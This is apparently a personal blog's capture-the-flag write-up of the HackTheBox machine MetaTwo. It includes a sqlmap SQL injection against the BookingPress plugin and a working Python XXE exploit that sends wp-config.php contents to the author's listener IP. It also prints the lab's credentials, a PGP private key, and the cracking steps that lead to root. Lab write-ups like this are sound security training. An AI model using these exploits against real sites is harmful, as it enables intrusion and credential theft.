HackTheBox – MetaTwo
Description
After the talk with certain pentester I realised i have little experience with XXE vulnerabilities so I decided to try out MetaTwo from HackTheBox. It is linux machine of easy difficulty. I very like the exploitation proccess since we have to exploit SQL injection and XXE vulnerabilities in order to get foolhold.
I feel this box is kind of OSCP-like.
Enumeration
nmap scan
vim
nmap -A -sVC <ip>
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
| 256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
|_ 256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I added http://metapress.htb to /etc/hosts
Port - 80 - wordpress
After opening webbrowser and navigation to http://metapress.htb we can see site:
When we navigate to /events we can see there is an action of scheduling startup meeting which we can perform.
After we appoint an event (or schedule meeting) we get information:
There is one vital thing i learnt during my OSCP course -> before going deep into one thing enumerate the whole system well. Wappalyer reveal that this site is using WordPress CMS.
The best tool for enumerating wordpress sites is wpscan. I will show only important findings in order to make the writeup more readable.
vim
wpscan --url http://metapress.htb/ -e vt,vp,cb,dbe,u1-10 --plugins-detection aggressive --plugins-version-detection aggressive
[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
| Found By: Rss Generator (Passive Detection)
| - http://metapress.htb/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
| - http://metapress.htb/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
|
| [!] 34 vulnerabilities identified:
|
| [!] Title: WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8
| Fixed in: 5.6.3
| References:
| - https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
| - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/29378
| - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
| - https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/
| - https://hackerone.com/reports/1095645
| - https://www.youtube.com/watch?v=3NBxcmqCgt4
|
..........
[+] bookingpress-appointment-booking
| Location: http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/
| Last Updated: 2023-05-12T07:48:00.000Z
| Readme: http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt
| [!] The version is out of date, the latest version is 1.0.61
|
| Found By: Known Locations (Aggressive Detection)
| - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/, status: 200
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: BookingPress < 1.0.11 - Unauthenticated SQL Injection
| Fixed in: 1.0.11
| References:
| - https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0739
| - https://plugins.trac.wordpress.org/changeset/2684789
|
| [!] Title: BookingPress < 1.0.31 - Unauthenticated IDOR in appointment_id
| Fixed in: 1.0.31
| References:
| - https://wpscan.com/vulnerability/8a7bd9f6-2789-474b-a237-01c643fdfba7
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4340
|
| Version: 1.0.10 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt
| Confirmed By: Translation File (Aggressive Detection)
| - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/languages/bookingpress-appointment-booking-en_US.po, Match: 'sion: BookingPress Appointment Booking v1.0.10'
...................
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://metapress.htb/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Sitemap (Aggressive Detection)
| - http://metapress.htb/wp-sitemap-users-1.xml
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] manager
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Exploitation of BookingPress < 1.0.11 - Unauthenticated SQL Injection
Description of vulnerability:
The plugin fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection.
When I submited appointment I had this request saved in my burp suite. I saved this request to a file and used sqlmap to exploit this vulnerability.
POC:
vim
sqlmap -r total_service_sqlinj --risk 3 --level 5 --passwords --threads 10 --string='Join us,' --technique=U --T wp_users --dump
___
__H__
___ ___[)]_____ ___ ___ {1.7.5#pip}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: python3 sqlmap [options]
sqlmap: error: no such option: --T
┌──(p4cm4n㉿P4cm4n-Rog)-[~/Pentest_Learning/HackTheBox/MetaTwo]
└─$ sqlmap -r total_service_sqlinj --risk 3 --level 5 --passwords --threads 10 --string='Join us,' --technique=U -T wp_users --dump
___
__H__
___ ___[']_____ ___ ___ {1.7.5#pip}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:34:25 /2023-05-20/
[12:34:25] [INFO] parsing HTTP request from 'total_service_sqlinj'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[12:34:26] [INFO] resuming back-end DBMS 'mysql'
[12:34:26] [INFO] testing connection to the target URL
[12:34:27] [INFO] testing if the provided string is within the target URL page content
[12:34:27] [WARNING] you provided 'Join us,' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: action=bookingpress_front_get_category_services&category_id=1&total_service=1) UNION ALL SELECT CONCAT(0x71786a6271,0x434c526e5a467779615554774c596d7749576f5a564750457947684f67734263616e7347514e6553,0x716b6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&_wpnonce=4785cd7afe
---
[12:34:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[12:34:27] [INFO] fetching database users password hashes
[12:34:27] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[12:34:27] [WARNING] the SQL query provided does not return any output
[12:34:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:34:28] [WARNING] the SQL query provided does not return any output
[12:34:28] [ERROR] unable to retrieve the password hashes for the database users
[12:34:28] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[12:34:28] [INFO] fetching current database
[12:34:28] [INFO] fetching columns for table 'wp_users' in database 'blog'
[12:34:28] [INFO] fetching entries for table 'wp_users' in database 'blog'
[12:34:28] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: blog
Table: wp_users
[2 entries]
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1 | http://metapress.htb | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. | admin@metapress.htb | admin | 0 | admin | admin | 2022-06-23 17:58:28 | <blank> |
| 2 | <blank> | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 | manager@metapress.htb | manager | 0 | manager | manager | 2022-06-23 18:07:55 | <blank> |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
[12:34:37] [INFO] table 'blog.wp_users' dumped to CSV file '/home/p4cm4n/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv'
[12:34:37] [INFO] fetched data logged to text files under '/home/p4cm4n/.local/share/sqlmap/output/metapress.htb'
I copied the hashes to a file and prepared for cracking using hashcat.
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
I cracked the hash of manager user.
I used this password to login to manager account:
Exploitation of WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8
Vulnerability description:
A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress used an audio parsing library called ID3 that was affected by an XML External Entity (XXE) vulnerability affecting PHP versions 8 and above.
For exploitation of this vulnerability we use tips from this page:
https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5
We need to create malicioius .wav file with xml code inside and external DTD file. We need to upload .wav file ID3 library parsing that is used by wordpress will parse our xml code and as result (SSRF) it will send http request our webserver. The external DTD contain the declaration of two parameter entities, first one is assigned to file on victim machine, the second perform SSRF attack to send the content of that file in http get request to our server.
POC:
In order to make it smooth I created bash and python scripts that will automate the process of uploading, creation xml files and decoding files content from http request.
vim
#!/bin/bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.74/xxe.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav
Pyton
#!/usr/bin/python3
import sys, base64, zlib, subprocess, requests, os, re
from http.server import HTTPServer, BaseHTTPRequestHandler, SimpleHTTPRequestHandler
from threading import Thread, current_thread
my_session = requests.Session()
external_dtd_filename = "xxe.dtd"
main_xml_filename = "something.wav"
my_ip = "10.10.14.74"
wpnonce = ''
nonce = ''
port_dl_server = 3000
proxy = {"http": "http://127.0.0.1:8080"}
def get_cookies():
global my_session
login_url = "http://metapress.htb/wp-login.php"
headers = {"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Origin": "http://metapress.htb",
}
data = "log=manager&pwd=partylikearockstar&wp-submit=Log+In&testcookie=1"
my_session.post(login_url,headers=headers,data=data, proxies=proxy)
def get_nonce():
global my_session, wpnonce, nonce
url = "http://metapress.htb/wp-admin/upload.php"
headers = {"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Origin": "http://metapress.htb"
}
r = my_session.get(url,headers=headers, proxies=proxy)
wpnonce = re.findall(r'"_wpnonce":"(.*)"',r.text)[0].split('"')[0]
nonce = re.findall(r'"nonce":"(.*)"',r.text)[0].split('"')[0]
def post_admin_ajax():
global my_session
url = "http://metapress.htb/wp-admin/admin-ajax.php"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "pl,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://metapress.htb/wp-admin/upload.php",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Origin": "http://metapress.htb",
}
data = f"interval=60&_nonce={nonce}&action=heartbeat&screen_id=upload&has_focus=false"
r = my_session.post(url, data=data,headers=headers, proxies=proxy)
def upload_file(filepath):
global my_session
create_malicious_xml()
create_external_dtd(filepath)
if(wpnonce == '' or nonce == ''):
get_nonce()
data = {'name':f"{main_xml_filename}",
'action':"upload-attachment",
'_wpnonce':f"{wpnonce}",}
files = {'async-upload': (f'{main_xml_filename}', open(f'{main_xml_filename}', 'rb'), 'audio/x-wav')}
upload_url = "http://metapress.htb/wp-admin/async-upload.php"
headers = {#"Content-Type": "multipart/form-data;",
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0",
"Accept": "*/*",
"Origin": "http://metapress.htb",
"Referer": "http://metapress.htb/wp-admin/upload.php",
"Accept-Language": "pl,en-US;q=0.7,en;q=0.3" }
r = my_session.post(upload_url,headers=headers,data=data,files=files,proxies=proxy)
def create_malicious_xml():
payload = f"./create_xxe_payload.sh {my_ip} {port_dl_server} {external_dtd_filename} {main_xml_filename}"
#print(payload)
os.system(payload)
def create_external_dtd(filepath):
file_content = f"""<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource={filepath}">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://{my_ip}/?p=%file;'>" >"""
with open(external_dtd_filename, "w") as f:
f.write(file_content)
class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
sth = (self.path).replace('/?p=','').replace('\n','')
self.send_response(200)
self.decode_msg(sth)
self.end_headers()
return
def decode_msg(self, msg):
print(msg)
proc = subprocess.Popen(f"php -r \"print(zlib_decode(base64_decode('{msg}')));\"", shell=True, stdout=subprocess.PIPE)
print(proc.stdout.read().decode())
class QuietHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
return
def start_server(dl_server):
if(not dl_server):
HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()
else:
HTTPServer(("0.0.0.0", port_dl_server), QuietHandler).serve_forever()
thread_rec_server = Thread(target=start_server, args=(False,))
thread_dl_server = Thread(target=start_server, args=(True,))
thread_rec_server.setDaemon(True)
thread_dl_server.setDaemon(True)
thread_rec_server.start()
thread_dl_server.start()
print("Started HTTP server on port 80")
print("Getting cookie")
get_cookies()
get_nonce()
post_admin_ajax()
while True:
filepath = input("Select file from path: ")
upload_file(filepath)
Now we can execute the script and look how it works:
There is a wordpress file that contain sensitive informations – wp-config.php
vim
Select file from path: ../wp-config.php
10.129.228.95 - - [20/May/2023 13:02:44] "GET /?p=jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIED............
.......
<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );
/** MySQL database username */
define( 'DB_USER', 'blog' );
/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );
.........
FTP files exfiltration / Shell as jnelson
Now we can use FTP credentials found in the wp-config.php file:
metapress.htb:9NYS_ii@FyL_p5M2NvJ
Let’s check the content of send_email.php:
Now we should check if there is credentials reuse for jnelson.
We managed to login to the box as jnelson.
Shell as root
In the home folder of jnelson I found interesting directory related to common password manager named passpie:
In the .keys file there is pgp public and private key -> it’s probably used for passpie encryption.
In the ssh directory there are ssh creds encrypted by gnupgp key.
vim
jnelson@meta2:~/.passpie$ cat .keys
-----BEGIN PGP PUBLIC KEY BLOCK-----
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
fo6KI+w2uXLaw+bIT1XZurDN
=dqsF
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP PRIVATE KEY BLOCK-----
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
=7Uo6
-----END PGP PRIVATE KEY BLOCK-----
I downloaded pgp key, removed public key and withdraw hash using pgp2john:
gpg2john keys | awk -F „:” '{print $2}’
I saved the ouput to file `hash` and used johntheripper to crack the hash:
john –wordlist=/usr/share/wordlists/rockyou.txt hash
After getting encryption password we just need to execute following command to get root password:
passpie copy ssh –passphrase blink182 –to stdout
Now we can use root password to switch users and get the flags:
Robert
21 grudnia, 2023 at 11:54 am
Hey, very cool post! I’ve learnt a lot!